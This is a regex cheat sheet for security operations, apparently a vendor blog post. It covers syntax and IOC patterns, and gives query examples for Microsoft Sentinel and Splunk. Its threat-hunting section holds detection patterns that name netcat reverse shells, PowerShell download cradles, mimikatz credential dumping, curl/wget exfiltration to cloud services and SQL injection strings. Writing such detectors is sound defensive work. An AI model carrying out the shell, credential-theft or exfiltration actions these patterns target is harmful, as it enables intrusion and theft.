Regular expressions (regex) are essential tools for cybersecurity professionals, enabling powerful pattern matching and text manipulation across SIEM platforms, log analysis systems, incident response workflows, and security automation. This comprehensive regex cheat sheet provides practical examples and patterns specifically designed for security operations, threat hunting, and digital forensics investigations.
What is Regex (Regular Expressions)?
Regular expressions (regex) are sequences of characters that define search patterns, used for pattern matching, text parsing, data validation, and string manipulation. In cybersecurity, regex enables SOC analysts to quickly search through massive volumes of security logs, identify indicators of compromise, detect anomalies, and automate threat detection across diverse data sources.
Why Security Professionals Need Regex:
- Log analysis: Parse millions of security events to find specific patterns
- Threat hunting: Search for IOCs (indicators of compromise) across log sources
- SIEM queries: Write efficient detection rules in Microsoft Sentinel, Splunk, Elastic
- Incident response: Extract relevant data during investigations
- Automation: Build scripts for security workflows and response actions
- Data validation: Ensure input meets security requirements
Basic Regex Syntax
Character Matchers
| Pattern | Description | Security Example |
|---|---|---|
| . | Matches any single character except newline | error.log matches "error1log", "errorAlog" |
| \d | Matches any digit (0-9) | port \d+ finds "port 443", "port 8080" |
| \D | Matches any non-digit | \D+ extracts text between numbers |
| \w | Matches word characters (letters, digits, underscore) | \w+@\w+\.com matches simple emails |
| \W | Matches non-word characters | Useful for finding special characters in logs |
| \s | Matches whitespace (space, tab, newline) | Failed\s+login matches "Failed login" |
| \S | Matches non-whitespace | \S+ extracts tokens without spaces |
Quantifiers
| Pattern | Description | Security Example |
|---|---|---|
| * | Matches 0 or more times | error.* matches "error", "error: timeout" |
| + | Matches 1 or more times | \d+ matches "123", "4567" but not empty |
| ? | Matches 0 or 1 time (optional) | https?:// matches "http://" or "https://" |
| {n} | Matches exactly n times | \d{4} matches 4-digit years "2026" |
| {n,} | Matches n or more times | [A-Z]{3,} matches 3+ uppercase letters |
| {n,m} | Matches between n and m times | \d{2,4} matches 2-4 digit numbers |
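As a quick illustration of the matchers and quantifiers above, here is a minimal Python sketch. The log line is invented for the example, and the variable names are placeholders rather than anything a particular tool expects.

```python
import re

# Hypothetical log line, invented for illustration.
line = "2026-01-10 Failed   login for svc_backup on port 8080 via http://intranet.local"

ports = re.findall(r"port \d+", line)         # \d+ : one or more digits
spaced = re.search(r"Failed\s+login", line)   # \s+ : any run of whitespace
schemes = re.findall(r"https?://", line)      # s?  : the "s" is optional
four_digit = re.findall(r"\b\d{4}\b", line)   # {4} : exactly four digits
tokens = re.findall(r"\S+", line)             # \S+ : whitespace-delimited tokens

print(ports)        # ['port 8080']
print(schemes)      # ['http://']
print(four_digit)   # ['2026', '8080']
print(len(tokens))  # 10
```

Note that \s+ tolerates the three spaces between "Failed" and "login", which a literal single space would not.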
Anchors and Boundaries
| Pattern | Description | Security Example |
|---|---|---|
| ^ | Matches start of line/string | ^ERROR finds lines starting with "ERROR" |
| $ | Matches end of line/string | \.exe$ finds lines ending with ".exe" |
| \b | Word boundary | \broot\b matches "root" but not "groot" |
| \B | Non-word boundary | \Broot\B matches the "root" inside "groots" but not standalone "root" or "groot" |
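Boundary behavior is easy to misjudge, so it is worth checking against a few strings. The sketch below uses Python's re module and a made-up list of sample strings; it only demonstrates where \b and \B do and do not match.

```python
import re

# Invented sample strings for illustration.
samples = ["root", "groot", "groots", "root login", "chroot"]

# \broot\b requires a word boundary on both sides of "root".
whole_word = re.compile(r"\broot\b")
# \Broot\B requires a word character on both sides of "root".
embedded = re.compile(r"\Broot\B")

whole_word_hits = [s for s in samples if whole_word.search(s)]
embedded_hits = [s for s in samples if embedded.search(s)]

print(whole_word_hits)  # ['root', 'root login']
print(embedded_hits)    # ['groots']
```

"groot" and "chroot" match neither pattern: the left side of "root" is not a boundary, but the right side (end of string) is.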
Cybersecurity-Specific Regex Patterns
IP Address Patterns
Basic IPv4:
\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b
Matches: 192.168.1.1, 10.0.0.1, 255.255.255.255
Strict IPv4 (validates 0-255 range):
\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b
IPv6 (addresses written with all eight groups; compressed forms such as ::1 are not matched):
([0-9a-fA-F]{0,4}:){7}[0-9a-fA-F]{0,4}
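The difference between the basic and strict IPv4 patterns shows up as soon as a log contains out-of-range octets. The following sketch compares them on an invented log line and, as an alternative, validates the basic pattern's candidates with Python's standard ipaddress module. The helper name is_valid_ipv4 is made up for this example.

```python
import ipaddress
import re

BASIC_IPV4 = re.compile(r"\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b")
STRICT_IPV4 = re.compile(
    r"\b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}"
    r"(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b"
)

# Hypothetical firewall line containing two impossible addresses.
log_line = "DENY src=192.168.1.1 dst=10.0.0.256 via 999.1.1.1"

basic_hits = BASIC_IPV4.findall(log_line)
strict_hits = STRICT_IPV4.findall(log_line)


def is_valid_ipv4(candidate: str) -> bool:
    """Return True if the string parses as an IPv4 address."""
    try:
        ipaddress.IPv4Address(candidate)
        return True
    except ValueError:
        return False


# Cheap regex first, then exact validation in code.
validated = [ip for ip in basic_hits if is_valid_ipv4(ip)]

print(basic_hits)   # ['192.168.1.1', '10.0.0.256', '999.1.1.1']
print(strict_hits)  # ['192.168.1.1']
print(validated)    # ['192.168.1.1']
```

In scripts, pairing the short pattern with a parser is often easier to maintain than the strict pattern; inside a SIEM query, where no parser is available, the strict pattern is the usual choice.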
Email Address Patterns
Basic Email:
[a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\.[a-zA-Z]{2,}
Advanced Email (RFC compliant):
(?:[a-z0-9!#$%&'*+/=?^_`{|}~-]+(?:\.[a-z0-9!#$%&'*+/=?^_`{|}~-]+)*|"(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21\x23-\x5b\x5d-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])*")@(?:(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9](?:[a-z0-9-]*[a-z0-9])?|\[(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?|[a-z0-9-]*[a-z0-9]:(?:[\x01-\x08\x0b\x0c\x0e-\x1f\x21-\x5a\x53-\x7f]|\\[\x01-\x09\x0b\x0c\x0e-\x7f])+)\])
URL Patterns
Basic URL:
https?://[^\s]+
Complete URL with validation:
https?://(?:www\.)?[-a-zA-Z0-9@:%._\+~#=]{1,256}\.[a-zA-Z0-9()]{1,6}\b(?:[-a-zA-Z0-9()@:%_\+.~#?&//=]*)
Suspicious URL patterns (phishing detection):
https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b
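One caveat with the phishing pattern above is that .* can run past the hostname and match a listed TLD anywhere later in the URL. The sketch below compares the pattern as written with a tightened variant that confines the TLD check to the host part. The variant (HOST_ONLY) and the sample URLs are assumptions made for illustration, not part of any standard rule set.

```python
import re

# Pattern as given above.
AS_WRITTEN = re.compile(
    r"https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://.*\.(?:tk|ml|ga|cf|gq)\b"
)
# Hypothetical tightened variant: [^\s/]* cannot cross the first "/" after the host.
HOST_ONLY = re.compile(
    r"https?://(?:[0-9]{1,3}\.){3}[0-9]{1,3}|https?://[^\s/]*\.(?:tk|ml|ga|cf|gq)\b"
)

# Invented URLs for illustration.
urls = [
    "http://203.0.113.7/login.php",
    "https://secure-update.example.tk/verify",
    "https://www.example.com/docs/file.tk.html",
    "https://example.com/",
]

loose_hits = [u for u in urls if AS_WRITTEN.search(u)]
tight_hits = [u for u in urls if HOST_ONLY.search(u)]

print(len(loose_hits))  # 3 (also flags the .com URL because of "file.tk" in the path)
print(len(tight_hits))  # 2
```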
File Path Patterns
Windows paths:
[a-zA-Z]:\\(?:[^\\/:*?"<>|\r\n]+\\)*[^\\/:*?"<>|\r\n]*
Matches: C:\Windows\System32\cmd.exe
Linux paths:
\/(?:[^\/\s]+\/)*[^\/\s]+
Matches: /var/log/auth.log
Suspicious temp file execution:
[a-zA-Z]:\\(?:Windows\\Temp|Users\\[^\\]+\\AppData\\Local\\Temp)\\.*\.exe
Hash Patterns (IOC Detection)
MD5:
\b[a-fA-F0-9]{32}\b
SHA1:
\b[a-fA-F0-9]{40}\b
SHA256:
\b[a-fA-F0-9]{64}\b
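Because the three hash patterns differ only in length, the \b anchors are what keep a SHA256 value from also being reported as an MD5. A minimal sketch, assuming a free-text report as input; the function name extract_hashes is hypothetical, and the sample hashes are generated with hashlib rather than taken from real indicators.

```python
import hashlib
import re

HASH_PATTERNS = {
    "md5": re.compile(r"\b[a-fA-F0-9]{32}\b"),
    "sha1": re.compile(r"\b[a-fA-F0-9]{40}\b"),
    "sha256": re.compile(r"\b[a-fA-F0-9]{64}\b"),
}


def extract_hashes(text):
    """Return every hash-shaped token in the text, grouped by type."""
    return {name: pattern.findall(text) for name, pattern in HASH_PATTERNS.items()}


# Build sample values so the example does not depend on hand-typed hex.
md5 = hashlib.md5(b"sample").hexdigest()
sha1 = hashlib.sha1(b"sample").hexdigest()
sha256 = hashlib.sha256(b"sample").hexdigest()

report = f"dropper md5={md5} sha1={sha1}\npayload sha256: {sha256}"
found = extract_hashes(report)

print(found["md5"] == [md5])        # True
print(found["sha256"] == [sha256])  # True
```

A length match only says the token looks like a hash. Any 32-character hex string, such as a GUID without dashes, will match the MD5 pattern too.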
Authentication Patterns
Failed login attempts:
(?i)(failed|failure|invalid).*(?:login|authentication|password|credential)
Privilege escalation:
(?i)(sudo|runas|elevate|privilege).*(?:granted|success|elevated)
Account lockout:
(?i)account.*(?:locked|disabled|suspended)
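To see how these authentication patterns behave on real-looking text, the sketch below classifies a handful of invented log lines. The classify function and the sample messages are assumptions for illustration; actual message formats vary by product.

```python
import re

FAILED_LOGIN = re.compile(
    r"(?i)(failed|failure|invalid).*(?:login|authentication|password|credential)"
)
LOCKOUT = re.compile(r"(?i)account.*(?:locked|disabled|suspended)")


def classify(line):
    """Label a log line using the two patterns above."""
    if LOCKOUT.search(line):
        return "lockout"
    if FAILED_LOGIN.search(line):
        return "failed_login"
    return "other"


# Hypothetical log lines.
lines = [
    "sshd[101]: Failed password for root from 203.0.113.5",
    "app: Invalid credentials supplied for bob",
    "app: Account alice has been locked after 5 attempts",
    "sshd[102]: Accepted password for carol from 198.51.100.7",
    "app: Authentication failure for user dave",
]

labels = [classify(line) for line in lines]
print(labels)
# ['failed_login', 'failed_login', 'lockout', 'other', 'other']
```

The last line is labeled "other" because the failed-login pattern expects the failure keyword to come before the noun. Messages phrased as "Authentication failure" need a second alternative with the order reversed.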
Malicious Command Patterns
PowerShell obfuscation:
(?i)powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)
Command and Control (C2) indicators:
(?i)(?:powershell|cmd|wscript).*(?:downloadstring|downloadfile|invoke-expression|iex)
Suspicious network commands:
(?:netcat|nc|ncat).*(?:-e|-c\s+[/\\]bin[/\\](?:bash|sh))
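Command-line patterns like these are best tried against both malicious and benign samples before they become alerts. Here is a small sketch that tags invented command lines with the first two patterns, compiled case-insensitively because PowerShell parameter names are not case-sensitive. The rule names and the tag function are placeholders.

```python
import re

RULES = {
    "encoded_or_hidden": re.compile(
        r"powershell.*(?:-e|-enc|-encodedcommand|-w\s+hidden)", re.IGNORECASE
    ),
    "download_cradle": re.compile(
        r"(?:powershell|cmd|wscript).*"
        r"(?:downloadstring|downloadfile|invoke-expression|iex)",
        re.IGNORECASE,
    ),
}


def tag(command_line):
    """Return the names of all rules that match the command line."""
    return [name for name, rule in RULES.items() if rule.search(command_line)]


# Hypothetical command lines.
encoded = tag("powershell.exe -NoP -W Hidden -Enc SQBFAFgA")
cradle = tag(
    "powershell -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://203.0.113.9/a.ps1')"
)
benign = tag("powershell -ExecutionPolicy Bypass -File backup.ps1")
unrelated = tag("cmd /c dir C:\\Users")

print(encoded)    # ['encoded_or_hidden']
print(cradle)     # ['download_cradle']
print(benign)     # ['encoded_or_hidden']
print(unrelated)  # []
```

The third result is a false positive: the bare -e alternative also matches the start of -ExecutionPolicy. Requiring whitespace after the flag, or dropping -e in favor of the longer spellings, is one way to trade recall for precision.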
Regex in SIEM Platforms
Microsoft Sentinel (KQL) Regex Examples
Find suspicious process execution:
SecurityEvent
| where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe'
Detect potential phishing emails:
EmailEvents
| where Subject matches regex '(?i)(urgent|action required|verify account|suspended)'
Identify lateral movement:
SecurityEvent
| where EventID == 4624
| where LogonType == 3
| where Account matches regex '.*\\\\admin.*'
Splunk Regex Examples
Extract failed SSH attempts:
source="/var/log/auth.log" "Failed password"
| rex field=_raw "Failed password for (?<user>\w+) from (?<src_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
Parse Windows Security logs:
source="WinEventLog:Security" EventCode=4625
| rex field=Message "Account Name:\s+(?<failed_account>\S+)"
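Outside a SIEM, the same named-group extraction can be prototyped in a script. The sketch below ports the SSH rex pattern to Python, where named groups are written (?P<name>...), and counts failures per source IP. The log lines are invented, and the variable names are illustrative only.

```python
import re
from collections import Counter

# Same pattern as the rex example, using Python's named-group syntax.
SSH_FAILED = re.compile(
    r"Failed password for (?P<user>\w+) "
    r"from (?P<src_ip>\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})"
)

# Hypothetical auth.log lines.
lines = [
    "Jan 10 10:01:02 host sshd[101]: Failed password for root from 203.0.113.5 port 52344 ssh2",
    "Jan 10 10:01:05 host sshd[101]: Failed password for admin from 203.0.113.5 port 52350 ssh2",
    "Jan 10 10:02:11 host sshd[102]: Accepted password for alice from 198.51.100.7 port 40022 ssh2",
    "Jan 10 10:03:00 host sshd[103]: Failed password for invalid user test from 198.51.100.9 port 40100 ssh2",
]

attempts = []
for line in lines:
    match = SSH_FAILED.search(line)
    if match:
        attempts.append((match.group("user"), match.group("src_ip")))

per_ip = Counter(ip for _, ip in attempts)

print(attempts)      # [('root', '203.0.113.5'), ('admin', '203.0.113.5')]
print(dict(per_ip))  # {'203.0.113.5': 2}
```

The fourth line is skipped because "invalid user test" puts two extra words between "for" and "from". Making that phrase optional with (?:invalid user )? is one possible extension.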
Advanced Regex Techniques
Lookahead and Lookbehind
| Pattern | Description | Example |
|---|---|---|
| (?=...) | Positive lookahead | password(?=\d) matches "password" only if followed by digit |
| (?!...) | Negative lookahead | user(?!admin) matches "user" not followed by "admin" |
| (?<=...) | Positive lookbehind | (?<=admin:)\w+ matches the word after "admin:" |
| (?<!...) | Negative lookbehind | (?<!un)authorized matches "authorized" but not the tail of "unauthorized" |
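Lookarounds assert what surrounds a match without consuming it, which is easiest to see by running each form on a short string. A minimal Python sketch with made-up inputs follows. Python's re requires lookbehind patterns to have a fixed width, which all of these do.

```python
import re

# Positive lookahead: "password" only when a digit follows (digit is not consumed).
ahead = re.findall(r"password(?=\d)", "password1 password passwordX password9")

# Negative lookahead: "user" unless "admin" follows.
not_ahead = [m.start() for m in re.finditer(r"user(?!admin)", "useradmin user1 user")]

# Positive lookbehind: the word right after "admin:".
behind = re.findall(r"(?<=admin:)\w+", "admin:alice guest:bob")

# Negative lookbehind: "authorized" unless preceded by "un".
not_behind = [m.start() for m in re.finditer(r"(?<!un)authorized", "authorized unauthorized")]

print(ahead)       # ['password', 'password']
print(not_ahead)   # [10, 16]
print(behind)      # ['alice']
print(not_behind)  # [0]
```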
Groups and Capturing
| Pattern | Description | Security Use Case |
|---|---|---|
| (...) | Capturing group | Extract specific fields from logs |
| (?:...) | Non-capturing group | Group patterns without memory overhead |
| (?<name>...) | Named capturing group | (?<ip>\d+\.\d+\.\d+\.\d+) names the capture |
| \1, \2 | Backreference | (\w+)\s+\1 finds repeated words |
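The choice between capturing and non-capturing groups changes what extraction functions return, not just how much the engine remembers. The sketch below shows this in Python on an invented log line. Python writes named groups as (?P<name>...), and the added \b anchors in the backreference pattern are an assumption to avoid matching inside longer words.

```python
import re

# Hypothetical log line.
line = "conn from 10.1.2.3 to 10.9.8.7 denied denied by policy"

# Named group: retrieve the capture by name instead of by position.
named = re.search(r"(?P<ip>\d+\.\d+\.\d+\.\d+)", line)
first_ip = named.group("ip")

# With a capturing group, findall returns the group's last repetition, not the full match.
capturing = re.findall(r"(\d{1,3}\.){3}\d{1,3}", line)
# With a non-capturing group, findall returns the whole match.
non_capturing = re.findall(r"(?:\d{1,3}\.){3}\d{1,3}", line)

# Backreference: \1 must repeat whatever group 1 captured.
repeated = re.search(r"\b(\w+)\s+\1\b", line)

print(first_ip)           # 10.1.2.3
print(capturing)          # ['2.', '8.']
print(non_capturing)      # ['10.1.2.3', '10.9.8.7']
print(repeated.group(1))  # denied
```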
Common Regex Flags
| Flag | Description | Security Application |
|---|---|---|
| i | Case insensitive | Match "ERROR", "error", "Error" equally |
| m | Multiline (^ and $ match line breaks) | Parse multi-line log entries |
| s | Dotall (. matches newlines) | Search across multiple log lines |
| g | Global (find all matches) | Extract all IPs from text |
| x | Extended (ignore whitespace, allow comments) | Write readable complex patterns |
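How flags are spelled depends on the engine. In Python's re module they are constants such as re.IGNORECASE, re.MULTILINE, re.DOTALL and re.VERBOSE, and there is no g flag because re.findall and re.finditer already return every match. A short sketch with invented inputs:

```python
import re

log = "info: started\nERROR: disk full\nerror: retrying\n"

# i + m: case-insensitive, and ^/$ match at every line break.
error_lines = re.findall(r"^error.*$", log, re.IGNORECASE | re.MULTILINE)

# s: without DOTALL the dot stops at a newline, so the block is not matched.
block = "BEGIN\npayload line\nEND"
without_dotall = re.search(r"BEGIN.*END", block)
with_dotall = re.search(r"BEGIN.*END", block, re.DOTALL)

# x: whitespace and # comments inside the pattern are ignored.
IPV4 = re.compile(
    r"""
    \b
    (?:\d{1,3}\.){3}   # three octets, each followed by a dot
    \d{1,3}            # final octet
    \b
    """,
    re.VERBOSE,
)
ips = IPV4.findall("src=10.0.0.5 dst=10.0.0.9")

print(error_lines)     # ['ERROR: disk full', 'error: retrying']
print(without_dotall)  # None
print(ips)             # ['10.0.0.5', '10.0.0.9']
```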
Regex Performance Tips for Security Operations
Optimization Best Practices:
- Use anchors: Start patterns with ^ when the match must begin at the start of a line, so the engine can reject non-matching lines without scanning them in full
- Be specific: Use \d instead of . when you only need digits
- Avoid catastrophic backtracking: Don't use nested quantifiers like (a+)+
- Use non-capturing groups: (?:...) when you don't need to extract data
- Compile patterns: Pre-compile frequently used regex in scripts
- Limit scope: Use boundaries \b to prevent unnecessary matching
- Test performance: Benchmark regex on sample logs before production use
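Two of the tips above, pre-compiling and avoiding nested quantifiers, can be checked with a few lines of Python. The sketch below times a nested-quantifier pattern against a flat equivalent on a deliberately short input that cannot match. The helper name time_match is made up, and actual timings depend on the machine and regex engine, so none are shown.

```python
import re
import time

# Compile once, reuse many times.
NESTED = re.compile(r"^(a+)+$")  # nested quantifier: many ways to split the same run of a's
FLAT = re.compile(r"^a+$")       # accepts exactly the same strings, with one way to match


def time_match(pattern, text):
    """Return (match result, elapsed seconds) for a single match attempt."""
    start = time.perf_counter()
    result = pattern.match(text)
    return result, time.perf_counter() - start


# The trailing "!" forces failure, which is what triggers backtracking.
# Keep the input short: each extra "a" roughly doubles the nested pattern's work.
text = "a" * 18 + "!"

nested_result, nested_secs = time_match(NESTED, text)
flat_result, flat_secs = time_match(FLAT, text)

print(f"nested: {nested_secs:.6f}s  flat: {flat_secs:.6f}s")
```

Both patterns reject the input, but on a backtracking engine the nested form explores a number of paths that grows exponentially with the input length. That is the behavior to look for when benchmarking detection rules on sample logs.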
Practical Threat Hunting Regex Examples
Detect Credential Dumping
(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)
Identifies tools and commands associated with credential theft
Find Ransomware Indicators
(?i)(\.encrypted|\.locked|\.crypto|_readme\.txt|ransom.*note|pay.*bitcoin)
Matches common ransomware file extensions and ransom notes
Identify Data Exfiltration
(?i)(?:curl|wget|powershell).*(?:pastebin|dropbox|mega|drive\.google).*(?:upload|put|post)
Detects commands uploading data to cloud services
Detect Persistence Mechanisms
(?i)(?:HKLM|HKCU)\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?
Finds registry keys commonly used for persistence
Find SQL Injection Attempts
(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()
Identifies common SQL injection patterns in web logs
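Hunting patterns like the ones above are typically run as a set, with each hit tagged by rule name. The following is a minimal sketch of that idea, using three of the patterns and invented events. The rule names and the match_rules function are assumptions, not a specific product's format.

```python
import re

HUNT_RULES = {
    "credential_dumping": re.compile(
        r"(?i)(mimikatz|lsadump|sekurlsa|logonpasswords|procdump.*lsass)"
    ),
    "ransomware": re.compile(
        r"(?i)(\.encrypted|\.locked|\.crypto|_readme\.txt|ransom.*note|pay.*bitcoin)"
    ),
    "sql_injection": re.compile(
        r"(?i)(\bunion\b.*\bselect\b|\bor\b.*1\s*=\s*1|'.*--|\bexec\s*\()"
    ),
}


def match_rules(event):
    """Return the names of all hunting rules that match the event text."""
    return [name for name, rule in HUNT_RULES.items() if rule.search(event)]


# Hypothetical events from different log sources.
events = [
    "cmd.exe /c procdump.exe -ma lsass.exe out.dmp",
    "GET /item?id=1' OR 1=1-- HTTP/1.1",
    "File renamed: Q3-report.xlsx.locked",
    "user alice opened report.docx",
]

hits = {event: match_rules(event) for event in events}
for event, rules in hits.items():
    print(rules, "<-", event)
```

Keeping the rules in one dictionary makes it easy to add a pattern and re-run the whole set against known-good logs to measure false positives.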
Testing and Debugging Regex
Recommended Regex Testing Tools:
- Regex101.com: Excellent for testing with explanations and performance metrics
- RegExr.com: Interactive testing with community patterns
- RegexBuddy: Desktop application for complex pattern development
- Python re module: Test patterns in your security scripts
- Online Regex Testers: Quick validation before SIEM deployment
Common Regex Mistakes in Security Operations
| Mistake | Problem | Solution |
|---|---|---|
| Greedy matching | .* matches too much | Use lazy .*? or specific patterns |
| Missing escapes | . matches any character | Escape special chars: \. |
| No anchors | Pattern matches anywhere | Use ^ and $ for specific positions |
| Inefficient patterns | Slow query performance | Optimize with specific character classes |
| Forgetting flags | Case-sensitive when shouldn't be | Add (?i) or /i flag for case-insensitive |
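The first two mistakes in the table are easy to reproduce. The sketch below uses an invented key="value" log line to contrast greedy, lazy, and negated-class matching, then shows what an unescaped dot lets through.

```python
import re

# Hypothetical key="value" log line.
line = 'user="alice" action="login" result="fail"'

greedy = re.findall(r'"(.*)"', line)       # runs from the first quote to the last
lazy = re.findall(r'"(.*?)"', line)        # stops at the nearest closing quote
specific = re.findall(r'"([^"]*)"', line)  # same result, without relying on backtracking

unescaped = re.search(r"cmd.exe", "cmd_exe")  # "." matches any character
escaped = re.search(r"cmd\.exe", "cmd_exe")   # "\." matches only a literal dot

print(greedy)     # ['alice" action="login" result="fail']
print(lazy)       # ['alice', 'login', 'fail']
print(specific)   # ['alice', 'login', 'fail']
print(unescaped is not None, escaped is not None)  # True False
```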
Regex in Security Automation Scripts
Python Example: Extract IPs from Logs
import re
# Read security log
with open('firewall.log', 'r') as f:
    content = f.read()
# Extract all IPs
ip_pattern = r'\b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b'
ips = re.findall(ip_pattern, content)
# Count unique source IPs
unique_ips = set(ips)
print(f"Found {len(unique_ips)} unique IP addresses")
PowerShell Example: Parse Windows Event Logs
Get-WinEvent -LogName Security -FilterXPath "*[System[EventID=4625]]" |
Select-Object -First 100 |
Where-Object {$_.Message -match 'Account Name:\s+(?<user>\S+)'} |
Select-Object TimeCreated, @{N='User';E={$Matches.user}}
Frequently Asked Questions
What is regex used for in cybersecurity?
Regex in cybersecurity is used for log analysis, threat detection, pattern matching in SIEM tools, parsing security events, validating input, detecting malicious patterns, analyzing network traffic, and automating incident response workflows. SOC analysts use regex daily to search through vast amounts of log data for indicators of compromise, suspicious activity, and security anomalies.
What does .* mean in regex?
In regex, .* means match any character (the dot .) zero or more times (the asterisk *). This creates a wildcard pattern that matches any run of characters, including the empty string, up to the end of the line (by default the dot does not match a newline). For example, 'error.*failure' matches 'error: system failure', 'error connection failure', or just 'errorfailure'. In security contexts, .* is commonly used in log queries to find events with specific keywords regardless of what appears between them, though it should be used carefully to avoid performance issues.
How do I match an IP address with regex?
To match an IP address with regex, use: \b(?:[0-9]{1,3}\.){3}[0-9]{1,3}\b for a basic pattern that matches any number sequence in IP format, or \b(?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\b for strict validation that ensures each octet is between 0-255. This pattern is essential for security log analysis, identifying source/destination IPs in firewall logs, detecting suspicious connection patterns in network traffic, and extracting IPs during forensic investigations.
What is the difference between * and + in regex?
In regex, * (asterisk) matches zero or more occurrences, while + (plus) matches one or more occurrences. For example: 'a*' matches '', 'a', 'aa', 'aaa' (including empty string), but 'a+' only matches 'a', 'aa', 'aaa' (requires at least one 'a'). In security contexts, use + when you need to ensure a pattern appears at least once, such as when searching for actual error messages (ERROR.+) rather than empty fields, or when extracting usernames that must contain at least one character (\w+).
How do I use regex in Microsoft Sentinel?
In Microsoft Sentinel, use regex with the "matches regex" operator in KQL (Kusto Query Language). Example: SecurityEvent | where CommandLine matches regex '[a-zA-Z]:\\\\Windows\\\\Temp\\\\.*\\.exe' searches for suspicious executables running from Windows temp folders. The backslashes are doubled twice because a quoted KQL string literal treats the backslash as an escape character before the regex engine sees the pattern. Regex in Sentinel enables advanced threat hunting, log parsing, custom detection rules, and correlation of security events across your environment. You can also use the extract() function and the parse operator (with kind=regex) for detailed log field extraction.
Conclusion: Master Regex for Security Operations
Regular expressions are indispensable tools for modern cybersecurity professionals. Whether you're a SOC analyst hunting threats in Microsoft Sentinel, a forensic investigator parsing evidence, or a security engineer building detection rules, mastering regex dramatically increases your efficiency and effectiveness.
This cheat sheet provides patterns and techniques specifically designed for security operations, but regex mastery comes through practice. Start with simple patterns, test thoroughly, and gradually build more complex expressions as your skills develop. Remember to optimize for performance: inefficient regex can slow SIEM queries and analysis during critical incident response situations.
subrosa's SOC team uses advanced regex patterns daily in Microsoft Sentinel for threat detection, log analysis, and automated response. Contact us to learn how our security experts can help optimize your detection rules and threat hunting workflows.